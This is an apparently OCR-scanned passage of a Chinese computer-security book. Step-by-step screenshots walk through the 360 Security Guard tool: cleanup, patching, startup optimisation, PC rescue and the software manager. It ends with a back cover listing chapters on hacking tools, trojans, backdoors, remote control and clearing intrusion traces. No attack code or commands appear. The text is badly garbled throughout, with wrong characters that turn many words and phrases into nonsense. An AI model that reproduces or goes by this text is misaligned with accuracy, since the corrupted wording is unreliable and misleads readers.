言 动 帮 您 清理 电 篱 垃圾 、 痕 过、 注册 志 


Coolie 包 会 上 网 . 购物 、 游 戏 等 记录 , 建议 定期 清理 ! 清理 时 机 


电脑 中 的 垃圾 
清理 系统 中 的 过 级 文件 , 释放 磋 主 写 间 ! 


清 还 所 用 癌 迹 可 以 有 效 保证 千 


注册 表 中 的 多 余 项 目 
优化 主帅 卖 结构 ， 提高 系统 性 能 ! 


电脑 中 不 必要 的 插件 
清理 系统 和 浏览 课 中 可 清理 的 揪 件 , 提升 运行 训 


可 对 计算 机 的 Cookie、 垃 圾 及 上 网 痕迹 等 进 和 
并 清理 。 


STEP09: 


J 了 检测 


选择 “优化 加 速 ” 选 项 卡 
国 了 /局 全 


电脑 体检 木马 全 杀 系统 修 息 电 脸 洁 理 
深度 优化 | ” 的 开机 时 间 | 启动 项 


El 日 区 


电 脸 救援 手机 助 考 软 忻 管家 
优化 沁 录 与 次 复 


正在 扫 摘 ,已 发 现 0 个 可 优化 项 目 


, 加快 开机 这 渡 


国 :ee 优化 系统 设置 和 内 存 设置 提高 系统 运 条 速度 


也 全 优化 系统 网 络 设 置 ， 提 这 上 网 这 谱 和 克 和 稳定 性 


有 一 键 优化 、 深 度 优化 、 我 的 开机 时 间 、 启 动 项 、 优 
化 记录 与 恢复 5 个 选项 。 
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甲 隔 体 松 木马 吾 条 思 蘑 清理 


发 现 135 个 漏洞 ， 其 中 7 个 高 危 漏洞 需 立 即 修复 。 
共 远 择 了 7 个 补丁 ,共和 基 下 载 25.98 MB，。 


360 系 统 蓝屏 修复 了 解 功能 

在 安 法 向 软 补丁 后 ,如 发 生 垩 屏 或 无 法 
启动 系统 等 问题 .能够 更 快速 帮 您 既 松 
解 夫 问 是 ， 质 利 进入 系统 。 


ba 
一 = 这 此 所 可 能 从 本 忆 病 喜 利用， 破坏 您 的 忆 脑 ， 请 立 别 修复 ， 


K82667402 - 次 该 服务 器 拒 僻 般 务 泌 泥 的 安全 更 新 2012-06-12 
K82757638 - 筑 软 XML 核 心服 务 远程 代码 执行 涛 油 
KB2760574 - Office 2003 安全 更 新 


2013-01-07 0.73MB 
2013-01-09 0,89MB 
KB2817474 - Office 2003 远程 代 强 执行 深 汕 
KB2861191 - .Net Framework 3.5 Sp1 安 全 更新 
KB2850047 - 党 软 图 你 组 件 远 得 代码 执行 演 涡 


为 什么 要 打 补丁 ? 快 来 转 现 
2013-09-11 5.35MB 


2013-10-04 0.25MB 360 安 全 卫士 企业 后 
打 补 丁 、 省 营 完 统一 管理 企业 安全 、 
永久 免费 ， 


2013-12-11 1L19MB 
、1。 软件 安全 更 新 
I 这些 更 新 用 于 修复 一 些 流行 软件 的 严重 安全 漏洞 ， 建议 立 别 修复 ， 


KB370182 - Adobe AIR 安全 更 新 程序 2013-12-10 17.26MB 


其 他 及 功能 性 更 新 补丁 
这 些 补 丁 用 于 村 新 系统 或 软件 的 功能 ,建议 您 根 舌 需要 园 择 性 进行 安装 。 


推荐 选项 补丁 管理 导出 泼 油 信 息 


单 击 “ 立 即 修复 ”按钮 ， 对 漏洞 进行 修复 。 


STEP08: 垃圾 扫描 完成 


回国 耐克 


电脑 体 棕 木马 坦 条 E33 优化 加 这 


清理 电脑 中 的 Cookie、 垃 圾 、 痕 迹 和 插件 ， 现 在 只 需 一 键 ! 
一 委 帮 您 广 阁 党 盘 空 间 ,清理 志 防 中 的 垃圾 ， 让 系统 运行 更 加 有 效 杰 ! 


自动 清理 
自动 帮 您 清理 电脑 垃圾 、 瘦 迹 、 注 册 志 
清理 电脑 中 的 Cookie 
三 四 Cookie 包 会 上 网 、 购 物 、 游 戏 等 记录 , 建议 十 期 清 池 站 理 时 机 
Y 清理 器 味 cookies 
清理 Flash Cookie 
清理 购物 网 站 Cookie 
清理 弟 箱 网 站 Cookie 
党 博 、 安 间 、 社 区 等 网 站 产生 约 Cookie 
Y 清理 其 它 未 和 的 Cookie 


电脑 中 的 垃圾 
清理 系 统 中 的 垃圾 文件 ， 释放 磋 香 研 间 ! 


使 用 电脑 和 上 网 产生 的 靖 变 
清理 使 用 病 迹 可 以 有 效 保证 您 的 隐私 安 


全 远 全 不 远 推荐 选择 


单 击 “ 一 键 清理 "按钮 ， 对 扫描 出 的 垃圾 等 进行 清理 。 


STEP10: 打开 “我 的 开机 时 间 ” 选 项 卡 


园 大 南 疯 可 上 日 


木马 合 杀 系统 修 息 电脑 洁 理 电 鹏 救 癸 帮 机 助 让 软件 管家 
| 深度 优化 


开机 历 穴 记录 


本 次 开机 时 间 | 分 | 日 妙 


悍 到 琶 着 了 人 本; 但: 局 何 ; 
击败 全 国 : 10% 的 电脑 
启动 程序 : 77 个 


总 评 
可 以 根据 沉 要 优化 的 项 目 共 占 用 时 间 0.1 砂 很 过 怪 ， 和 您 的 本 机 违 度假 丁 全 同 大 部 分 


电脑， 成 绩 叶 不 理 烛 ,但 可 以 通过 清理 
BD mewsss (nso) 优化 电脑 上 的 软件 来 滨 步 改革 


本 次 开机 速度 : 祁 0 


本 次 开机 共 启动 了 77 个 程序 , 共用 时 1 分 18 秒 


建议 优化 的 项目 共 占用 时 间 12 秒 
ED Encrypting File System( 加 密 文 件 系 统 ) 


建议 维持 开机 局 动 的 现 目 共 占 用 时间 15.0 秒 
ED ory 
sm 


B33 rewerE resmeae ss) 
后 讯 财 付 谤 的 服务 
IKE and AuthIP IPsec Keying ModulesGKE 了 AuthIP IPSec 密 衣服 务 ) 


开机 速度 杯 生 了 
分 享 上 网 水 安慰 - 


晶 晤 开机 时 间 


显示 所 有 开机 项 目 所 占用 的 开机 时 间 ， 可 手动 禁止 
不 必要 的 开机 局 动 项 目 。 
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系统 安全 防护 工具 
STEP11: ”打开 “ 尼 动 项 ”选项 卡 STEP123 打开 “优化 记录 与 恢复 ”选项 


EL 


电脑 体检 木马 查 儿 系统 修 电脑 清理 优化 加 束 电脑 救 迫 手机 助手 软件 管家 
一 键 优化 。 | 深度 优化 我 的 开机 时 间 启动 项 


p> 9 


用 腾 体 检 术 马 柯 浴 系统 修 如 电 莫 消 理 优化 加 这 及 局 竹 泥 于 机 助手 软 性 管家 
我 的 开机 时 间 局 为 项 优化 记录 与 次 所 


局 动 蜡 (8) 。 计 划 任务 (10) 各 局 动 播 件 (5) 。 应 下 软件 爱 务 (12) 。 系 婉 关 锅 股 务 (47) 
软件 匀称 大 让 可 


全 山 串 过 杀毒 次 件 的 启动 程序 (已 失效 ) 
禁止 后 , 将 不 全 芳 居 动 会 山 毒 堪 的 实时 鉴 入 功能 。 


共 2 冬 优化 站 录 , 怎 可 以 点 击 右 册 的 “ 钦 复 ” 按 包 恢复 总 优化 的 项 目 


日 期 :今天 
< 玉 星 杀毒 软件 托盘 程序 


禁止 后 , 梅 不 自动 开启 瑞星 杀 雪 软件 的 实时 监控 功能 , 


19% 


瑞明 杀毒 软件 托盘 垦 序 
禁止 后 , 椅 不 自动 开启 流星 对 过 软件 的 实时 些 芝 功 朋 。 
cs i 于 星 软件 部 团 服 务 ( RSD ) 


富 动 洲 星 软件 铺 计 、 安 全 助手 、> 


工商 银行 网 很 相关 程序 
禁止 后 , 可 能 会 史 六 网 上 梁 行 的 想 关 功 论 . 


360 和 杀毒 
” 冰 久 免费 ， 人 性 艇 起 强 的 杀 吕 软件 。 荣 止 后 ,将 面 虱 严重 安全 三 过 ， 


360 安 全 卫士 
最 受 欢迎 的 闲 木马、 防盗 二 安 全 软件 。 茶 止 后 ， 椅 丙 蜂 产 重 安全 茂 革 ， 


sDTray 
暂 无 简介 


58 帮 帮 
58 帮 帮 戎 天 客户 壬 ， 放 于 如 寺 基 天 功能 , 


可 专门 针对 开机 局 动 项 进行 茶 止 启动 、 恢 复 局 动 、 可 对 系统 误 优 化 的 项 目 进行 恢复 。 
延迟 至 系统 空闲 时 启动 等 操作 。 


STEP13: 选择 “电脑 救援 ”标签 STEP14: 进入 修复 界面 


一 


己 E6O 〇 电脑 救援 玺 您 可 毅 晃 到 的 问题 ; 
@ ”所 访 茎 常 出 现 芝 异 @ 浏览 顽 外 观 异 军 @ 12306 网 站 证 书 锚 肖 @ 系统 字体 模糊 
@ 人 快 于 方式 异 气 @ ”网 洛 视 闫 要 不 了 @ Hash 请 求 存储 信息 @ 无 去 定位 序数 EEE 


音 修复 可 能 需要 校长 时 间 ， 请 您 耐心 等 竺 
上 网 异常 四 图 游戏 环境 四 上 电脑 卡 悍 到 


上 不 了 网 QQ 同时 CF 之 起火 线 。 。 雇 少 "dl 文件 所 脑 开 机 太 慢 。。 记 随 太 卡 
| 网 页 打 不 开 主页 被 复 改 网 页 游戏 玩 不 了 ”游戏 经 党 挤 颖 优化 hn 这 网 页 打开 避 
12306 证 书 异 误 。 网 页 筷 码 DNF 地 下 城 丽 士 “游戏 无 法 全 屏 虑 拟 内 存 不 足 。。 玩 游戏 太 卡 修复 根 关 声音 文件 


正在 为 您 的 电脑 进行 再 音 修 复 文件 检测 


备份 当前 系统 服务 与 注册 表 


| - ， 一 修复 主 册 来 内 声音 潘 让 相关 项 目 
| 修复 声音 相关 服务 项 


署 不 了 网 络 视 频 。 况 烦 疫 备 异 党 | 右 下 角 漳 厂 | | Ba 任务 管理 请 异常 
要 您 头 打 不 开 Of 币 ce 闫 题 QQ 无 流 登 录 思议 经 曙 昔 屏 饮 理 方式 小 第 头 
网 页 没有 闫 宫 网 急 昌 是 软件 筷 码 | 办 入 法 问题 。 。 不 能 旺 动 剧 新 i 修复 高 音 相 关 设置 


检测 声卡 驱动 是 否 正常 


有 自动 工具 救援、 以 播放 视频 时 没有 声 ” 单 击 “ 立 即 修复 ”按钮 ， 即 可 对 问题 进行 修复 。 
人 工 在 线 救援 以 及 附 站 福 尖 全 

近 商 家 救援 3 个 选项 。 。 频 声音 中 的 “没有 声音 ” 

STEP15: ”选择 “软件 管家 ”标签 


莹 本 必 备 共 39 款 软 件 ,已 安装 8 款 ” 豆 示 已 安 半 软件 360 安 全 浏览 全 
影音 必 备 。 游戏 必 备 上 网 必 备 。 系统 必 备 办公 必 备 
安全 上 网 
< 、 360 手 机 助手 安 点 版 会 谷 会 人 全 
轻松 管理 你 的 宏 点 丢 统 手机 6.9 分 投票 
* 全 部 软件 (15351) 360 安 全 浏览 器 6.3 会 例会 安富 
* 视 尖 软件 (731) 防 木马、 防 巾 诈 、 速 度 快 、 实 全 好 月 的 济 守 路 8.2 分 投 至 


* 聊天 工具 (198) 
颌 宽 会 帘 定 


| 二 用 户 可 进行 软件 下 载 、 安 装 、 升 级 、 印 载 等 操作 ， 


* 网 络 游戏 (463) 一 -一 富 合 合 富 窜 10. 
| 确保 游戏 安全 ,优化 系统 优化 网 过 8.2 分 投票 常 O 
* 言 乐 软件 (527 


”安全 杀毒 (90) 
* 系统 工具 (2067) 


飞信 2013 感 轧 乒 便宜 会 安 窒 
* 下 载 工 内 (122) 中 国 移动 推出 的 综合 通信 忠 务 软件 ， 可 拓 费 发 六 短信 6.7 分 投标 
* 办 公 坎 件 (67 刀 
* 手 机 数码 (239) 


* 输入 法 (86) 
软件 管家 目前 标本 : 5.0.0.1180 铂 次 件 小 由 手 闪 没 置 * 下 载 管理 


届 计 QQ 2013 正 式 版 SP2 会 窗 会 安 合 
丘 汛 推出 的 免费 即时 聊天 软件 6.6 分 投票 


349 


省 
全 攻略 


网 络 安全 技术 丛书 


本 书 主要 内 容 


从 零 开 始 认识 黑 吉 
扫描 与 唱 控 工具 
系统 漏洞 攻防 
病毒 攻防 

木马 攻防 

网 游 与 网 吧 攻 防 
注入 工具 

黑 寡 入 侵 检 误工 具 
入 侵 瘦 迹 清除 技术 


The. Complete Guide tO Hacking Téols 
黑夜 给 了 我 黑色 的 眼睛 ， 我 却 用 它 来 寻找 漏洞 


地 址 ， 北京 市 百 万 庄 大 街 22 号 | | 
部 政 含 局， 100037 
电话 是 务 
明 务 耳 容 热线 010-88361066 | 
请 者 西江 人 性 圳 ，010.65326264 
D010-88379209 
网 总 最 务 
新 而 而 ,局 亲生 间作 .CGG 
walbo com/cmpi1952 
Www goldernr-bocok com | 
WW 


Cima Corm 
封面 无 季 人 乙 标 均 为 章 版 


包工 育 辣 
i 


和 全 才 
载 育 服 类 岗 


密码 攻防 


网 络 代理 导 追 踊 护 术 


后 门 技 术 
远程 控制 技术 
局 域 网 攻防 
QQ 账号 攻防 


系统 和 数据 的 备份 与 恢复 


系统 安全 防护 工具 
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